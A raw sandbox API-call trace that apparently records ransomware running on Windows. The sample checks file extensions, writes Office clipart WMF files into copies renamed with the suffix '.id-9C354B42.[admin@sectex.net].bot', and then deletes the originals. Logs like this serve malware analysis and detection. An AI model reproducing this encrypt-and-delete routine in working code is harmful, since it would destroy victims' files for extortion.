	[0160.194] lstrlenW (lpString=".ppt") returned 4
	[0160.194] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF") returned 63
	[0160.194] lstrlenW (lpString=".zip") returned 4
	[0160.194] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.194] lstrlenW (lpString=".rar") returned 4
	[0160.194] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.194] lstrlenW (lpString=".bz2") returned 4
	[0160.194] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.194] lstrlenW (lpString=".7z") returned 3
	[0160.194] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF") returned 63
	[0160.194] lstrlenW (lpString=".dbf") returned 4
	[0160.194] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF") returned 63
	[0160.194] lstrlenW (lpString=".1cd") returned 4
	[0160.194] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF") returned 63
	[0160.194] lstrlenW (lpString=".jpg") returned 4
	[0160.194] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF") returned 63
	[0160.194] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF") returned 63
	[0160.194] lstrlenW (lpString=".doc") returned 4
	[0160.194] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0160.194] lstrlenW (lpString=".docx") returned 5
	[0160.194] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0160.194] lstrlenW (lpString=".pdf") returned 4
	[0160.194] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0160.195] lstrlenW (lpString=".xls") returned 4
	[0160.195] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0160.195] lstrlenW (lpString=".xlsx") returned 5
	[0160.195] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0160.195] lstrlenW (lpString=".ppt") returned 4
	[0160.195] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0160.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF") returned 63
	[0160.195] lstrlenW (lpString=".zip") returned 4
	[0160.195] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0160.195] lstrlenW (lpString=".rar") returned 4
	[0160.195] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0160.195] lstrlenW (lpString=".bz2") returned 4
	[0160.195] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0160.195] lstrlenW (lpString=".7z") returned 3
	[0160.195] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0160.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF") returned 63
	[0160.195] lstrlenW (lpString=".dbf") returned 4
	[0160.195] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0160.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF") returned 63
	[0160.195] lstrlenW (lpString=".1cd") returned 4
	[0160.195] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0160.195] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107154.WMF") returned 63
	[0160.195] lstrlenW (lpString=".jpg") returned 4
	[0160.195] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0160.195] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0160.195] lstrlenW (lpString="J0107158.WMF") returned 12
	[0160.195] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107158.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0160.441] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=24908) returned 1
	[0160.441] CloseHandle (hObject=0x3c0) returned 1
	[0160.441] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107158.wmf")) returned 0x20
	[0160.680] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107158.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107158.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0160.686] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.686] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107158.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0160.693] GetLastError () returned 0x0
	[0160.693] ReadFile (in: hFile=0x3c4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x614c, lpOverlapped=0x0) returned 1
	[0160.702] WriteFile (in: hFile=0x37c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x6150, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x6150, lpOverlapped=0x0) returned 1
	[0160.703] ReadFile (in: hFile=0x3c4, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.703] WriteFile (in: hFile=0x37c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.703] SetEndOfFile (hFile=0x37c) returned 1
	[0160.703] CloseHandle (hObject=0x37c) returned 1
	[0160.703] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.703] SetEndOfFile (hFile=0x3c4) returned 1
	[0160.706] CloseHandle (hObject=0x3c4) returned 1
	[0160.706] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.031] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107158.wmf")) returned 1
	[0161.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF") returned 63
	[0161.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF") returned 63
	[0161.041] lstrlenW (lpString=".doc") returned 4
	[0161.041] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.041] lstrlenW (lpString=".docx") returned 5
	[0161.041] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.041] lstrlenW (lpString=".pdf") returned 4
	[0161.041] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.041] lstrlenW (lpString=".xls") returned 4
	[0161.041] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.041] lstrlenW (lpString=".xlsx") returned 5
	[0161.041] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.041] lstrlenW (lpString=".ppt") returned 4
	[0161.041] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF") returned 63
	[0161.041] lstrlenW (lpString=".zip") returned 4
	[0161.041] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.041] lstrlenW (lpString=".rar") returned 4
	[0161.041] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.041] lstrlenW (lpString=".bz2") returned 4
	[0161.041] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.041] lstrlenW (lpString=".7z") returned 3
	[0161.041] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF") returned 63
	[0161.042] lstrlenW (lpString=".dbf") returned 4
	[0161.042] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF") returned 63
	[0161.042] lstrlenW (lpString=".1cd") returned 4
	[0161.042] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF") returned 63
	[0161.042] lstrlenW (lpString=".jpg") returned 4
	[0161.042] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF") returned 63
	[0161.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF") returned 63
	[0161.042] lstrlenW (lpString=".doc") returned 4
	[0161.042] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.042] lstrlenW (lpString=".docx") returned 5
	[0161.042] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0161.042] lstrlenW (lpString=".pdf") returned 4
	[0161.042] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.042] lstrlenW (lpString=".xls") returned 4
	[0161.042] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.042] lstrlenW (lpString=".xlsx") returned 5
	[0161.042] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0161.042] lstrlenW (lpString=".ppt") returned 4
	[0161.042] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF") returned 63
	[0161.042] lstrlenW (lpString=".zip") returned 4
	[0161.042] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.042] lstrlenW (lpString=".rar") returned 4
	[0161.042] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.042] lstrlenW (lpString=".bz2") returned 4
	[0161.042] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.042] lstrlenW (lpString=".7z") returned 3
	[0161.042] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF") returned 63
	[0161.043] lstrlenW (lpString=".dbf") returned 4
	[0161.043] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF") returned 63
	[0161.043] lstrlenW (lpString=".1cd") returned 4
	[0161.043] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107158.WMF") returned 63
	[0161.043] lstrlenW (lpString=".jpg") returned 4
	[0161.043] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.043] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.043] lstrlenW (lpString="J0107264.WMF") returned 12
	[0161.043] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107264.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0161.056] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=5272) returned 1
	[0161.056] CloseHandle (hObject=0x388) returned 1
	[0161.056] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107264.wmf")) returned 0x20
	[0161.094] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107264.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.094] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107264.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.094] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.095] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107264.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0161.095] GetLastError () returned 0x0
	[0161.095] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1498, lpOverlapped=0x0) returned 1
	[0161.107] WriteFile (in: hFile=0x1b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x14a0, lpOverlapped=0x0) returned 1
	[0161.108] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.108] WriteFile (in: hFile=0x1b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.108] SetEndOfFile (hFile=0x1b4) returned 1
	[0161.108] CloseHandle (hObject=0x1b4) returned 1
	[0161.108] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.108] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.110] CloseHandle (hObject=0x3f0) returned 1
	[0161.110] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.111] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107264.wmf")) returned 1
	[0161.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63
	[0161.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63
	[0161.112] lstrlenW (lpString=".doc") returned 4
	[0161.112] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.112] lstrlenW (lpString=".docx") returned 5
	[0161.112] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0161.112] lstrlenW (lpString=".pdf") returned 4
	[0161.112] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.112] lstrlenW (lpString=".xls") returned 4
	[0161.112] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.112] lstrlenW (lpString=".xlsx") returned 5
	[0161.112] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0161.112] lstrlenW (lpString=".ppt") returned 4
	[0161.112] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.112] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63
	[0161.112] lstrlenW (lpString=".zip") returned 4
	[0161.112] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.112] lstrlenW (lpString=".rar") returned 4
	[0161.112] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.112] lstrlenW (lpString=".bz2") returned 4
	[0161.112] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.112] lstrlenW (lpString=".7z") returned 3
	[0161.113] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63
	[0161.113] lstrlenW (lpString=".dbf") returned 4
	[0161.113] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63
	[0161.113] lstrlenW (lpString=".1cd") returned 4
	[0161.113] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63
	[0161.113] lstrlenW (lpString=".jpg") returned 4
	[0161.113] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63
	[0161.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63
	[0161.113] lstrlenW (lpString=".doc") returned 4
	[0161.113] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.113] lstrlenW (lpString=".docx") returned 5
	[0161.113] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0161.113] lstrlenW (lpString=".pdf") returned 4
	[0161.113] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.113] lstrlenW (lpString=".xls") returned 4
	[0161.113] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.113] lstrlenW (lpString=".xlsx") returned 5
	[0161.113] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0161.113] lstrlenW (lpString=".ppt") returned 4
	[0161.113] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63
	[0161.113] lstrlenW (lpString=".zip") returned 4
	[0161.113] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.113] lstrlenW (lpString=".rar") returned 4
	[0161.113] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0161.113] lstrlenW (lpString=".bz2") returned 4
	[0161.113] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0161.113] lstrlenW (lpString=".7z") returned 3
	[0161.114] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0161.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63
	[0161.114] lstrlenW (lpString=".dbf") returned 4
	[0161.114] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0161.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63
	[0161.114] lstrlenW (lpString=".1cd") returned 4
	[0161.114] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0161.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107264.WMF") returned 63
	[0161.114] lstrlenW (lpString=".jpg") returned 4
	[0161.114] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0161.114] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0161.114] lstrlenW (lpString="J0107300.WMF") returned 12
	[0161.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107300.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.115] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=2460) returned 1
	[0161.115] CloseHandle (hObject=0x3f0) returned 1
	[0161.115] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107300.wmf")) returned 0x20
	[0161.115] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107300.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0161.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107300.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0161.115] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.115] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107300.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0161.116] GetLastError () returned 0x0
	[0161.116] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x99c, lpOverlapped=0x0) returned 1
	[0161.118] WriteFile (in: hFile=0x1b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x9a0, lpOverlapped=0x0) returned 1
	[0161.118] ReadFile (in: hFile=0x3f0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0161.118] WriteFile (in: hFile=0x1b4, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0161.119] SetEndOfFile (hFile=0x1b4) returned 1
	[0161.119] CloseHandle (hObject=0x1b4) returned 1
	[0161.119] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.119] SetEndOfFile (hFile=0x3f0) returned 1
	[0161.121] CloseHandle (hObject=0x3f0) returned 1
	[0161.121] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.121] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107300.wmf")) returned 1
	[0161.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF") returned 63
	[0161.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF") returned 63
	[0161.122] lstrlenW (lpString=".doc") returned 4
	[0161.122] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0161.122] lstrlenW (lpString=".docx") returned 5
	[0161.122] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0161.122] lstrlenW (lpString=".pdf") returned 4
	[0161.122] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0161.122] lstrlenW (lpString=".xls") returned 4
	[0161.122] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0161.122] lstrlenW (lpString=".xlsx") returned 5
	[0161.122] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0161.122] lstrlenW (lpString=".ppt") returned 4
	[0161.122] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0161.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107300.WMF") returned 63
	[0161.122] lstrlenW (lpString=".zip") returned 4
	[0161.122] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0161.122] lstrlenW (lpString=".rar") returned 4
